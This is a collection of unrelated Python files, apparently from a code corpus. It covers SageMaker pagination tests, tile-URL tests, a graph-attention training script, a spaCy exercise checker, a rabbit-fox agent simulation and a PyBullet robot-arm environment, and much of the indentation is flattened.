assert xgboost_processing_job_1.get("NextToken").should_not.be.none
xgboost_processing_job_next = client.list_processing_jobs(
NameContains="xgboost",
MaxResults=1,
NextToken=xgboost_processing_job_1.get("NextToken"),
)
assert len(xgboost_processing_job_next["ProcessingJobSummaries"]).should.equal(1)
assert xgboost_processing_job_next["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("xgboost-1")
assert xgboost_processing_job_next.get("NextToken").should_not.be.none
@mock_sagemaker
def test_list_processing_jobs_paginated_with_target_in_middle():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
vgg_processing_job_1 = client.list_processing_jobs(NameContains="vgg", MaxResults=1)
assert len(vgg_processing_job_1["ProcessingJobSummaries"]).should.equal(0)
assert vgg_processing_job_1.get("NextToken").should_not.be.none
vgg_processing_job_6 = client.list_processing_jobs(NameContains="vgg", MaxResults=6)
assert len(vgg_processing_job_6["ProcessingJobSummaries"]).should.equal(1)
assert vgg_processing_job_6["ProcessingJobSummaries"][0][
"ProcessingJobName"
].should.equal("vgg-0")
assert vgg_processing_job_6.get("NextToken").should_not.be.none
vgg_processing_job_10 = client.list_processing_jobs(
NameContains="vgg", MaxResults=10
)
assert len(vgg_processing_job_10["ProcessingJobSummaries"]).should.equal(5)
assert vgg_processing_job_10["ProcessingJobSummaries"][-1][
"ProcessingJobName"
].should.equal("vgg-4")
assert vgg_processing_job_10.get("NextToken").should.be.none
@mock_sagemaker
def test_list_processing_jobs_paginated_with_fragmented_targets():
client = boto3.client("sagemaker", region_name="us-east-1")
for i in range(5):
name = "xgboost-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/foobar-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
for i in range(5):
name = "vgg-{}".format(i)
arn = "arn:aws:sagemaker:us-east-1:000000000000:x-x/barfoo-{}".format(i)
MyProcessingJobModel(processing_job_name=name, role_arn=arn).save()
processing_jobs_with_2 = client.list_processing_jobs(NameContains="2", MaxResults=8)
assert len(processing_jobs_with_2["ProcessingJobSummaries"]).should.equal(2)
assert processing_jobs_with_2.get("NextToken").should_not.be.none
processing_jobs_with_2_next = client.list_processing_jobs(
NameContains="2",
MaxResults=1,
NextToken=processing_jobs_with_2.get("NextToken"),
)
assert len(processing_jobs_with_2_next["ProcessingJobSummaries"]).should.equal(0)
assert processing_jobs_with_2_next.get("NextToken").should_not.be.none
processing_jobs_with_2_next_next = client.list_processing_jobs(
NameContains="2",
MaxResults=1,
NextToken=processing_jobs_with_2_next.get("NextToken"),
)
assert len(processing_jobs_with_2_next_next["ProcessingJobSummaries"]).should.equal(
0
)
assert processing_jobs_with_2_next_next.get("NextToken").should.be.none
|
23057
|
import pytest
import datetime
import json
import functools
from urllib.parse import urlencode, parse_qs
from descarteslabs.common.graft import client as graft_client
from ... import types
from .. import tile_url
def test_url():
base = "foo"
base_q = base + "?"
url = functools.partial(tile_url.tile_url, base, types.Image.from_id(""))
assert url() == base
assert url(session_id="foo") == base_q + urlencode({"session_id": "foo"})
assert url(colormap="foo") == base_q + urlencode({"colormap": "foo"})
assert url(colormap="") == base_q + urlencode({"colormap": ""})
assert url(reduction="mean") == base_q + urlencode({"reduction": "mean"})
assert url(checkerboard=True) == base_q + urlencode({"checkerboard": "true"})
assert url(checkerboard=False) == base_q + urlencode({"checkerboard": "false"})
assert url(bands=["red"]) == base_q + urlencode({"band": "red"})
assert url(bands=["red", "green"]) == base_q + urlencode(
{"band": ["red", "green"]}, doseq=True
)
with pytest.raises(ValueError, match="Up to 3 bands may be specified, not 4"):
url(bands=["a", "b", "c", "d"])
# 1-band scales are normalized
assert url(scales=[0, 1]) == base_q + urlencode({"scales": "[[0.0, 1.0]]"})
    # If all scales are None, "null" is sent
assert url(scales=[None, None]) == base_q + urlencode({"scales": "null"})
# test everything gets added together correctly
got_base, params = url(
session_id="foo", colormap="bar", bands=["red", "green"]
).split("?")
assert got_base == base
query = parse_qs(params, strict_parsing=True, keep_blank_values=True)
assert query == {
# `parse_qs` returns all values wrapped in lists
"session_id": ["foo"],
"colormap": ["bar"],
"band": ["red", "green"],
}
@pytest.mark.parametrize(
"args",
[
{
"p1": "2021-01-20",
"p2": 2.2,
"p3": 1,
},
{
"p1": datetime.datetime(2020, 1, 20),
"p2": types.Float(1.1) + 1,
"p3": 1,
},
{
"p1": types.Datetime(2021, 1, 20),
"p2": types.Float(1.1) + 1,
"p3": types.Int(1),
},
],
)
def test_url_arguments(args):
func = types.Function[
dict(p1=types.Datetime, p2=types.Float, p3=types.Int), types.Image
]("x")
base = "http://base.net"
url = functools.partial(tile_url.tile_url, base, func)
with pytest.raises(TypeError, match="missing a required argument"):
url()
with pytest.raises(TypeError, match="got an unexpected keyword argument 'blah'"):
url(**args, blah="bad")
with graft_client.consistent_guid():
got_base, params = url(**args).split("?")
assert got_base == base
query = parse_qs(params, strict_parsing=True, keep_blank_values=True)
assert query.keys() == args.keys()
with graft_client.consistent_guid():
p1_graft = types.Datetime._promote(args["p1"]).graft
assert query["p1"] == [json.dumps(p1_graft)]
if isinstance(args["p2"], float):
assert query["p2"] == ["2.2"]
else:
assert query["p2"] == [json.dumps(args["p2"].graft)]
assert query["p3"] == ["1"]
def test_no_url_for_positional_only_function():
with pytest.raises(
TypeError, match="cannot use Functions with positional-only arguments"
):
tile_url.tile_url("", types.Function[types.Int, {}, types.Image]("x"))
def test_validate_scales():
assert tile_url.validate_scales([[0.0, 1.0], [0.0, 2.0], [-1.0, 1.0]]) == [
[0.0, 1.0],
[0.0, 2.0],
[-1.0, 1.0],
]
assert tile_url.validate_scales([[0.0, 1.0]]) == [[0.0, 1.0]]
# ints -> floats
assert tile_url.validate_scales([[0, 1]]) == [[0.0, 1.0]]
# 1-band convenience
assert tile_url.validate_scales([0, 1]) == [[0.0, 1.0]]
# no scalings
assert tile_url.validate_scales(None) == []
assert tile_url.validate_scales([]) == []
with pytest.raises(TypeError, match="Expected a list or tuple of scales"):
tile_url.validate_scales(0)
with pytest.raises(TypeError, match="Expected a list or tuple of scales"):
tile_url.validate_scales("foo")
with pytest.raises(TypeError, match="Scaling 0: expected a 2-item list or tuple"):
tile_url.validate_scales([1, 2, 3])
with pytest.raises(TypeError, match="Scaling 0: items in scaling must be numbers"):
tile_url.validate_scales([1, "foo"])
with pytest.raises(ValueError, match="expected up to 3 scales, but got 4"):
tile_url.validate_scales([[0.0, 1.0], [0.0, 1.0], [0.0, 1.0], [0.0, 1.0]])
with pytest.raises(ValueError, match="but length was 3"):
tile_url.validate_scales([[0.0, 1.0, 2.0]])
with pytest.raises(ValueError, match="but length was 1"):
tile_url.validate_scales([[0.0]])
with pytest.raises(ValueError, match="one number and one None in scales"):
tile_url.validate_scales([[None, 1.0]])
|
23097
|
import os
import time
import random
import scipy.sparse as sp
import numpy as np
import tensorflow as tf
import argparse
from models import SpHGAT
from utils import process
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', help='Dataset.', default='imdb', type=str)
parser.add_argument('--epochs', help='Epochs.', default=100000, type=int)
parser.add_argument('--patience', help='Patience for early stopping.', default=100, type=int)
parser.add_argument('--lr', help='Learning rate.', default=0.005, type=float)
parser.add_argument('--l2_coef', help='Weight decay.', default=0.0005, type=float)
parser.add_argument('--dropout', help='Dropout.', default=0.6, type=float)
parser.add_argument('--train_rate', help='Label rate for training.', default=0.1, type=float)
parser.add_argument('--seed', help='Random seed for data splitting.', default=None, type=int)
parser.add_argument('--layers', help='Number of layers.', default=2, type=int)
parser.add_argument('--hid', help='Number of hidden units per head in each layer.',
nargs='*', default=[8, 8], type=int)
parser.add_argument('--heads', help='Number of attention heads in each layer.',
nargs='*', default=[8, 1], type=int)
parser.add_argument('--residue', help='Using residue.', action='store_true')
parser.add_argument('--repeat', help='Repeat.', default=10, type=int)
parser.add_argument('--random_feature', help='Random features', action='store_true')
parser.add_argument('--target_node', help='index of target nodes for classification.',
nargs='*', default=[0, 1], type=int)
parser.add_argument('--target_is_multilabels', help='Whether each type of target node for classification is multi-label (0 means no, any other value means yes).',
                    nargs='*', default=[0, 1], type=int)
parser.add_argument('--saved_model_suffix', help='Suffix to split checkpoints by.', default="", type=str)
parser.add_argument('--no_attn_reg', help='Do not use edge direction regularization', action='store_true')
parser.add_argument('--simple_inner', help='Use original inner product', action='store_true')
parser.add_argument('--loop_coef', help='Coefficient for regularization.', default=1e-3, type=float)
parser.add_argument('--inv_coef', help='Coefficient for regularization.', default=1e-3, type=float)
config = tf.ConfigProto(allow_soft_placement=True)
config.gpu_options.allow_growth = True
args = parser.parse_args()
dataset = args.dataset
checkpt_file = 'pre_trained/{}/{}/{}.ckpt'.format(dataset, args.saved_model_suffix, dataset)
checkpt_file = checkpt_file.replace('//', '/')
process.mkdir(os.path.split(checkpt_file)[0])
# training params
batch_size = 1
train_rate = args.train_rate
seed = args.seed
nb_epochs = args.epochs
patience = args.patience
lr = args.lr # learning rate
l2_coef = args.l2_coef # weight decay
dropout = args.dropout
repeat = args.repeat
random_feature = args.random_feature
target_node = args.target_node
is_multilabel = [False if t==0 else True for t in args.target_is_multilabels]
loop_coef = args.loop_coef
inv_coef = args.inv_coef
layers = args.layers
hid = args.hid
if len(hid) == 1:
    hid_units = hid * layers
elif len(hid) == layers:
    hid_units = hid
else:
    raise ValueError('--hid must contain either one value or one value per layer.')
heads = args.heads
if len(heads) == 1:
    n_heads = heads * layers
elif len(heads) == 2:
    n_heads = [heads[0]] * (layers - 1) + [heads[1]]
elif len(heads) == layers:
    n_heads = heads
else:
    raise ValueError('--heads must contain one, two, or one value per layer.')
residual = args.residue # False
nonlinearity = tf.nn.elu
model = SpHGAT
no_attn_reg = args.no_attn_reg
simple_inner = args.simple_inner
random.seed(seed) # random seed for random data split only
print('Dataset: ' + dataset)
print('Train rate: ' + str(train_rate))
print('----- Opt. hyperparams -----')
print('lr: ' + str(lr))
print('l2_coef: ' + str(l2_coef))
print('----- Archi. hyperparams -----')
print('nb. layers: ' + str(len(hid_units)))
print('nb. units per layer: ' + str(hid_units))
print('nb. attention heads: ' + str(n_heads))
print('residual: ' + str(residual))
print('nonlinearity: ' + str(nonlinearity))
print('model: ' + str(model))
print('target nodes: ', target_node)
print('is_multilabel: ', is_multilabel)
print('loop_coef:', loop_coef)
print('inv_coef:', inv_coef)
sparse = True
metr_num = 2
total_vl_acc = np.array([0.]*(len(target_node)*metr_num)) # should be array
total_ts_acc = np.array([0.]*(len(target_node)*metr_num)) # should be array
def get_loss_acc(logits, labels, msk, is_multilabel=False):
global model
class_num = labels.shape[-1]
log_resh = tf.reshape(logits, [-1, class_num])
lab_resh = tf.reshape(labels, [-1, class_num])
msk_resh = tf.reshape(msk, [-1])
if is_multilabel:
loss = model.masked_sigmoid_cross_entropy(log_resh, lab_resh, msk_resh)
accuracy = [model.micro_f1(log_resh, lab_resh, msk_resh), model.macro_f1(log_resh, lab_resh, msk_resh)]
acc_name = ['if1', 'af1']
acc_full_name = ['micro f1', 'macro f1']
else:
loss = model.masked_softmax_cross_entropy(log_resh, lab_resh, msk_resh)
accuracy = [model.micro_f1_onelabel(log_resh, lab_resh, msk_resh), model.macro_f1_onelabel(log_resh, lab_resh, msk_resh)]
acc_name = ['if1', 'af1']
acc_full_name = ['micro f1', 'macro f1']
return loss, accuracy, acc_name, acc_full_name
def print_eachclass_info(train_loss_each, train_acc_each, val_loss_each, val_acc_each, acc_name):
tl_average = np.mean(np.array(train_loss_each), axis=0)
ta_average = np.mean(np.array(train_acc_each), axis=0)
vl_average = np.mean(np.array(val_loss_each), axis=0)
va_average = np.mean(np.array(val_acc_each), axis=0)
metric_num = int(len(ta_average)/len(tl_average))
for i in range(len(tl_average)):
line = '\t\t target %s: loss = %.3f, ' % (i, tl_average[i])
for j in range(metric_num):
line += '%s = %.5f, ' % (acc_name[i*metric_num+j], ta_average[i*metric_num+j])
line += '| Val: loss = %.3f, ' % (vl_average[i])
for j in range(metric_num):
line += '%s = %.5f, ' % (acc_name[i*metric_num+j], va_average[i*metric_num+j])
print(line)
for repeat_i in range(repeat):
print('Run #' + str(repeat_i) + ':')
adj, adj_type, edge_list, features, y_train, y_val, y_test,\
train_mask, val_mask, test_mask = process.load_heterogeneous_data(dataset, train_rate=train_rate, target_node=target_node)
features = [process.preprocess_features(feature)[0] for feature in features]
nb_nodes = [feature.shape[0] for feature in features]
ft_size = [feature.shape[1] for feature in features]
nb_classes = [y.shape[1] for y in y_train]
features = [feature[np.newaxis] for feature in features]
y_train = [y[np.newaxis] for y in y_train]
y_val = [y[np.newaxis] for y in y_val]
y_test = [y[np.newaxis] for y in y_test]
train_mask = [m[np.newaxis] for m in train_mask]
val_mask = [m[np.newaxis] for m in val_mask]
test_mask = [m[np.newaxis] for m in test_mask]
if random_feature:
features[0] = np.random.standard_normal(features[0].shape)
if sparse:
biases = [process.preprocess_adj_hete(a) for a in adj] # transposed here
else:
biases = []
for a in adj:
            a = a.todense()
            a = a[np.newaxis]
            biases.append(a)  # keep the dense adjacency for feeding later
if no_attn_reg:
edge_list = [(i,) for i in range(len(adj_type))]
if simple_inner:
edge_list = []
with tf.Graph().as_default():
with tf.name_scope('input'):
ftr_in = [tf.placeholder(dtype=tf.float32,
shape=(batch_size, nb, ft)) for nb, ft in zip(nb_nodes, ft_size)]
if sparse:
bias_in = [tf.sparse_placeholder(dtype=tf.float32) for _ in biases]
else:
bias_in = None
lbl_in = [tf.placeholder(dtype=tf.int32, shape=(batch_size, nb_nodes[target_node[i]], nb_classes[i])) for i in range(len(nb_classes))]
msk_in = [tf.placeholder(dtype=tf.int32, shape=(batch_size, nb_nodes[target_node[i]])) for i in range(len(nb_classes))]
attn_drop = tf.placeholder(dtype=tf.float32, shape=())
ffd_drop = tf.placeholder(dtype=tf.float32, shape=())
is_train = tf.placeholder(dtype=tf.bool, shape=())
logits = model.inference(ftr_in, nb_classes, nb_nodes, is_train,
attn_drop, ffd_drop, target_nodes=target_node,
bias_mat=bias_in, adj_type=adj_type,
edge_list=edge_list,
hid_units=hid_units, n_heads=n_heads,
residual=residual, activation=nonlinearity)
with tf.name_scope('loss_acc'):
loss, accuracy, acc_name, acc_full_name = [], [], [], []
all_class_loss = 0.0
for tn in range(len(target_node)):
tn_logits = logits[tn]
tn_labels = lbl_in[tn]
tn_masks = msk_in[tn]
tn_is_multilabel = is_multilabel[tn]
tn_loss, tn_accuracy, tn_acc_name, tn_acc_full_name = get_loss_acc(tn_logits, tn_labels, tn_masks, is_multilabel=tn_is_multilabel)
loss.append(tn_loss)
accuracy.extend(tn_accuracy)
acc_name.extend(tn_acc_name)
acc_full_name.extend(tn_acc_full_name)
all_class_loss += tn_loss
loss_loop = tf.add_n(tf.get_collection('loss_loop')) * loop_coef
            loss_inv = tf.add_n(tf.get_collection('loss_inv')) * inv_coef
train_op = model.training(all_class_loss + loss_loop + loss_inv, lr, l2_coef)
saver = tf.train.Saver()
init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())
vlss_mn = np.inf
vacc_mx = 0.0
curr_step = 0
with tf.Session(config=config) as sess:
sess.run(init_op)
vacc_early_model = 0.0
vlss_early_model = 0.0
vacc_each_early_model = np.array([0.]*(len(target_node)*metr_num))
for epoch in range(nb_epochs):
# summary information
train_loss_avg = 0
train_acc_avg = 0
val_loss_avg = 0
val_acc_avg = 0
# for each class information
train_loss_each = []
train_acc_each = []
val_loss_each = []
val_acc_each = []
tr_step = 0
tr_size = features[0].shape[0]
while tr_step * batch_size < tr_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[tr_step * batch_size:(tr_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[tr_step * batch_size:(tr_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[tr_step*batch_size:(tr_step+1)*batch_size] for i, d in zip(lbl_in, y_train)})
fd.update({i:d[tr_step*batch_size:(tr_step+1)*batch_size] for i, d in zip(msk_in, train_mask)})
fd.update({is_train: True})
fd.update({attn_drop: dropout, ffd_drop:dropout})
_, loss_list_tr, acc_list_tr, loss_loop_tr, loss_inv_tr = sess.run([train_op, loss, accuracy, loss_loop, loss_inv], feed_dict=fd)
train_loss_each.append(np.array(loss_list_tr))
train_acc_each.append(np.array(acc_list_tr))
train_loss_avg += np.sum(np.array(loss_list_tr))
train_acc_avg += np.sum(np.array(acc_list_tr))
tr_step += 1
vl_step = 0
vl_size = features[0].shape[0]
while vl_step * batch_size < vl_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[vl_step * batch_size:(vl_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[vl_step * batch_size:(vl_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[vl_step*batch_size:(vl_step+1)*batch_size] for i, d in zip(lbl_in, y_val)})
fd.update({i:d[vl_step*batch_size:(vl_step+1)*batch_size] for i, d in zip(msk_in, val_mask)})
fd.update({is_train: False})
fd.update({attn_drop: 0.0, ffd_drop:0.0})
loss_list_vl, acc_list_vl = sess.run([loss, accuracy], feed_dict=fd)
acc_list_vl = [0. if np.isnan(acc_vl) else acc_vl for acc_vl in acc_list_vl]
val_loss_each.append(np.array(loss_list_vl))
val_acc_each.append(np.array(acc_list_vl))
val_loss_avg += np.sum(np.array(loss_list_vl))
val_acc_avg += np.sum(np.array(acc_list_vl))
vl_step += 1
print('Training %s: loss = %.5f, %s = %.5f, loss_loop = %.5f, loss_inv = %.5f | Val: loss = %.5f, %s = %.5f' %
(epoch, train_loss_avg/tr_step, 'acc/F1', train_acc_avg/tr_step,
loss_loop_tr, loss_inv_tr,
val_loss_avg/vl_step, 'acc/F1', val_acc_avg/vl_step))
print_eachclass_info(train_loss_each, train_acc_each, val_loss_each, val_acc_each, acc_name)
if val_acc_avg/vl_step > vacc_mx or val_loss_avg/vl_step < vlss_mn:
if val_acc_avg/vl_step > vacc_mx and val_loss_avg/vl_step < vlss_mn:
vacc_early_model = val_acc_avg/vl_step
vlss_early_model = val_loss_avg/vl_step
vacc_each_early_model = np.mean(np.array(val_acc_each), axis=0)
saver.save(sess, checkpt_file)
print("saved model as %s"%checkpt_file)
vacc_mx = np.max((val_acc_avg/vl_step, vacc_mx))
vlss_mn = np.min((val_loss_avg/vl_step, vlss_mn))
curr_step = 0
else:
curr_step += 1
if curr_step == patience:
print('Early stop! Min loss: ', vlss_mn,
', Max', 'acc/F1', ': ', vacc_mx)
print('Early stop model validation loss: ', vlss_early_model,
', ', 'acc/F1', ': ', vacc_early_model)
total_vl_acc += vacc_each_early_model
break
if curr_step < patience:
print('Min loss: ', vlss_mn, ', Max', 'acc/F1', ': ', vacc_mx)
print('model validation loss: ', vlss_early_model, ', ', 'acc/F1', ': ', vacc_early_model)
total_vl_acc += vacc_each_early_model
saver.restore(sess, checkpt_file)
ts_size = features[0].shape[0]
ts_step = 0
test_loss_each = []
test_acc_each = []
while ts_step * batch_size < ts_size:
if sparse:
fd = {i: d for i, d in zip(ftr_in, features)}
fd.update({i: d for i, d in zip(bias_in, biases)})
else:
fd = {i: d[ts_step * batch_size:(ts_step + 1) * batch_size]
for i, d in zip(ftr_in, features)}
fd.update({i: d[ts_step * batch_size:(ts_step + 1) * batch_size]
for i, d in zip(bias_in, biases)})
fd.update({i:d[ts_step*batch_size:(ts_step+1)*batch_size] for i, d in zip(lbl_in, y_test)})
fd.update({i:d[ts_step*batch_size:(ts_step+1)*batch_size] for i, d in zip(msk_in, test_mask)})
fd.update({is_train: False})
fd.update({attn_drop: 0.0, ffd_drop:0.0})
loss_list_ts, acc_list_ts = sess.run([loss, accuracy], feed_dict=fd)
test_loss_each.append(np.array(loss_list_ts))
test_acc_each.append(np.array(acc_list_ts))
ts_step += 1
test_loss_each = np.mean(np.array(test_loss_each), axis=0)
test_acc_each = np.mean(np.array(test_acc_each), axis=0)
print('*'*10,'Test information:', '*'*10)
for e in range(len(target_node)):
print('target %s: loss: %.3f, %s:%.5f, %s:%.5f' % (e, test_loss_each[e], acc_full_name[e*metr_num], test_acc_each[e*metr_num], acc_full_name[e*metr_num+1], test_acc_each[e*metr_num+1]))
total_ts_acc += test_acc_each
sess.close()
print('Validation:', total_vl_acc/repeat, 'Test:', total_ts_acc/repeat)
|
23147
|
def test():
assert "spacy.load" in __solution__, "Rufst du spacy.load auf?"
assert nlp.meta["lang"] == "de", "Lädst du das korrekte Modell?"
assert nlp.meta["name"] == "core_news_sm", "Lädst du das korrekte Modell?"
assert "nlp(text)" in __solution__, "Verarbeitest du den Text korrekt?"
assert "print(doc.text)" in __solution__, "Druckst du den Text des Doc?"
__msg__.good(
"Gut gemacht! Jetzt wo du das Laden von Modellen geübt hast, lass uns "
"mal ein paar ihrer Vorhersagen anschauen."
)
|
23148
|
import pycxsimulator
from pylab import *
import copy as cp
nr = 500. # carrying capacity of rabbits
r_init = 100 # initial rabbit population
mr = 0.03 # magnitude of movement of rabbits
dr = 1.0 # death rate of rabbits when it faces foxes
rr = 0.1 # reproduction rate of rabbits
f_init = 30 # initial fox population
mf = 0.05 # magnitude of movement of foxes
df = 0.1 # death rate of foxes when there is no food
rf = 0.5 # reproduction rate of foxes
cd = 0.02 # radius for collision detection
cdsq = cd ** 2
class agent:
pass
def initialize():
global agents
agents = []
for i in range(r_init + f_init):
ag = agent()
ag.type = 'r' if i < r_init else 'f'
ag.x = random()
ag.y = random()
agents.append(ag)
def observe():
global agents
cla()
rabbits = [ag for ag in agents if ag.type == 'r']
if len(rabbits) > 0:
x = [ag.x for ag in rabbits]
y = [ag.y for ag in rabbits]
plot(x, y, 'b.')
foxes = [ag for ag in agents if ag.type == 'f']
if len(foxes) > 0:
x = [ag.x for ag in foxes]
y = [ag.y for ag in foxes]
plot(x, y, 'ro')
axis('image')
axis([0, 1, 0, 1])
def update_one_agent():
global agents
if agents == []:
return
ag = choice(agents)
# simulating random movement
m = mr if ag.type == 'r' else mf
ag.x += uniform(-m, m)
ag.y += uniform(-m, m)
ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x
ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y
# detecting collision and simulating death or birth
neighbors = [nb for nb in agents if nb.type != ag.type
and (ag.x - nb.x)**2 + (ag.y - nb.y)**2 < cdsq]
if ag.type == 'r':
if len(neighbors) > 0: # if there are foxes nearby
if random() < dr:
agents.remove(ag)
return
if random() < rr*(1-sum([1 for x in agents if x.type == 'r'])/nr):
agents.append(cp.copy(ag))
else:
if len(neighbors) == 0: # if there are no rabbits nearby
if random() < df:
agents.remove(ag)
return
else: # if there are rabbits nearby
if random() < rf:
agents.append(cp.copy(ag))
def update():
global agents
t = 0.
while t < 1. and len(agents) > 0:
t += 1. / len(agents)
update_one_agent()
pycxsimulator.GUI().start(func=[initialize, observe, update])
|
23164
|
import pybullet_data
import pybullet as p
import time
import numpy as np
from src.utils_geom import *
from src.utils_depth import *
from src.panda import Panda
def full_jacob_pb(jac_t, jac_r):
return np.vstack((jac_t[0], jac_t[1], jac_t[2], jac_r[0], jac_r[1], jac_r[2]))
class pandaEnv():
def __init__(self,
urdfRoot=pybullet_data.getDataPath(),
mu=0.3,
sigma=0.01,
timestep=1./240.,
long_finger=False,
):
self._urdfRoot = urdfRoot
self._timeStep = timestep
self._pandaId = None
self._planeId = None
self._tableId = None
self._mu = mu
self._sigma = sigma
self.long_finger = long_finger
def reset_env(self):
p.resetSimulation()
p.setPhysicsEngineParameter(numSolverIterations=150,
enableConeFriction=1,
contactBreakingThreshold=1e-3)
p.setTimeStep(self._timeStep)
# Set gravity
p.setGravity(0, 0, -9.81)
# Load plane and table
self._planeId = p.loadURDF(self._urdfRoot+'/plane.urdf', basePosition=[0, 0, -1], useFixedBase=1)
self._tableId = p.loadURDF(self._urdfRoot+'/table/table.urdf', basePosition=[0.4000000, 0.00000, -0.63+0.005], baseOrientation=[0, 0, 0, 1.0], useFixedBase=1)
# Load arm, no need to settle (joint angle set instantly)
self._panda = Panda(self.long_finger)
self._pandaId = self._panda.load()
# Set friction coefficients of arm and table
self.change_friction_coeffs(self._mu, self._sigma)
# Create a constraint to keep the fingers centered (upper links)
fingerGear = p.createConstraint(self._pandaId,
9,
self._pandaId,
11,
jointType=p.JOINT_GEAR,
jointAxis=[1, 0, 0],
parentFramePosition=[0, 0, 0],
childFramePosition=[0, 0, 0])
p.changeConstraint(fingerGear, gearRatio=-1, erp=0.1, maxForce=2*self._panda.maxFingerForce)
# Disable damping for all links
for i in range(self._panda.numJoints):
p.changeDynamics(self._pandaId, i,
linearDamping=0,
angularDamping=0)
def change_friction_coeffs(self, mu, sigma):
p.changeDynamics(self._pandaId, self._panda.pandaLeftFingerLinkIndex, lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
p.changeDynamics(self._pandaId, self._panda.pandaRightFingerLinkIndex, lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
p.changeDynamics(self._tableId, -1,
lateralFriction=mu,
spinningFriction=sigma,
frictionAnchor=1,
)
def reset_arm_joints_ik(self, pos, orn, fingerPos=0.0):
jointPoses = list(p.calculateInverseKinematics(self._pandaId,
self._panda.pandaEndEffectorLinkIndex,
pos, orn,
jointDamping=self._panda.jd,
lowerLimits=self._panda.jointLowerLimit,
upperLimits=self._panda.jointUpperLimit,
jointRanges=self._panda.jointRange,
restPoses=self._panda.jointRestPose,
residualThreshold=1e-4))
# , maxNumIterations=1e5))
jointPoses = jointPoses[:7] + [0, -np.pi/4, fingerPos, 0.00, fingerPos, 0.00]
self._panda.reset(jointPoses)
def reset_arm_joints(self, joints):
jointPoses = joints + [0, -np.pi/4, self._panda.fingerOpenPos,
0.00, self._panda.fingerOpenPos, 0.00]
self._panda.reset(jointPoses)
########################* Arm control *#######################
def move_pos(self, absolute_pos=None,
relative_pos=None,
absolute_global_euler=None, # preferred
relative_global_euler=None, # preferred
relative_local_euler=None, # not using
absolute_global_quat=None, # preferred
relative_azi=None, # for arm
# relative_quat=None, # never use relative quat
numSteps=50,
maxJointVel=0.20,
relativePos=True,
globalOrn=True,
checkContact=False,
checkPalmContact=False,
objId=None,
gripper_target_pos=None,
timeStep=0):
# Get trajectory
eePosNow, eeQuatNow = self._panda.get_ee()
# Determine target pos
if absolute_pos is not None:
targetPos = absolute_pos
elif relative_pos is not None:
targetPos = eePosNow + relative_pos
else:
targetPos = eePosNow
# Determine target orn
if absolute_global_euler is not None:
targetOrn = euler2quat(absolute_global_euler)
elif relative_global_euler is not None:
targetOrn = quatMult(euler2quat(relative_global_euler), eeQuatNow)
elif relative_local_euler is not None:
targetOrn = quatMult(eeQuatNow, euler2quat(relative_local_euler))
elif absolute_global_quat is not None:
targetOrn = absolute_global_quat
elif relative_azi is not None:
# Extrinsic yaw
targetOrn = quatMult(euler2quat([relative_azi[0],0,0]), eeQuatNow)
# Intrinsic pitch
targetOrn = quatMult(targetOrn, euler2quat([0,relative_azi[1],0]))
# elif relative_quat is not None:
# targetOrn = quatMult(eeQuatNow, relative_quat)
else:
            targetOrn = np.array([1.0, 0., 0., 0.])
# Get trajectory
trajPos = self.traj_time_scaling(startPos=eePosNow,
endPos=targetPos,
numSteps=numSteps)
# Run steps
numSteps = len(trajPos)
for step in range(numSteps):
# Get joint velocities from error tracking control
jointDot = self.traj_tracking_vel(targetPos=trajPos[step], targetQuat=targetOrn)
# Send velocity commands to joints
for i in range(self._panda.numJointsArm):
p.setJointMotorControl2(self._pandaId,
i,
p.VELOCITY_CONTROL,
targetVelocity=jointDot[i],
force=self._panda.maxJointForce[i],
maxVelocity=maxJointVel)
if gripper_target_pos is None:
# Keep gripper current velocity
p.setJointMotorControl2(self._pandaId,
self._panda.pandaLeftFingerJointIndex,
p.VELOCITY_CONTROL,
targetVelocity=self._panda.fingerCurVel,
force=self._panda.maxJointForce[i],
maxVelocity=0.04)
p.setJointMotorControl2(self._pandaId,
self._panda.pandaRightFingerJointIndex,
p.VELOCITY_CONTROL,
targetVelocity=self._panda.fingerCurVel,
force=self._panda.maxJointForce[i],
maxVelocity=0.04)
else:
p.setJointMotorControl2(self._pandaId,
self._panda.pandaLeftFingerJointIndex,
p.POSITION_CONTROL,
targetPosition=gripper_target_pos,
maxVelocity=0.04)
p.setJointMotorControl2(self._pandaId,
self._panda.pandaRightFingerJointIndex,
p.POSITION_CONTROL,
targetPosition=gripper_target_pos,
maxVelocity=0.04)
# Quit if contact at either finger or palm
if checkContact:
contact = self.check_contact(objId, both=False)
if contact:
return timeStep, False
if checkPalmContact:
contact = self.check_palm_contact(objId)
if contact:
return timeStep, False
# Step simulation
p.stepSimulation()
timeStep += 1
return timeStep, True
def grasp(self, targetVel=0):
# Change gripper velocity direction
if targetVel > 1e-2 or targetVel < -1e-2: # Use specified velocity if available
self._panda.fingerCurVel = targetVel
else:
if self._panda.fingerCurVel > 0.0:
self._panda.fingerCurVel = -0.05
else:
self._panda.fingerCurVel = 0.05
return
def traj_time_scaling(self, startPos, endPos, numSteps):
trajPos = np.zeros((numSteps, 3))
for step in range(numSteps):
s = 3 * (1.0 * step / numSteps) ** 2 - 2 * (1.0 * step / numSteps) ** 3
trajPos[step] = (endPos-startPos)*s+startPos
return trajPos
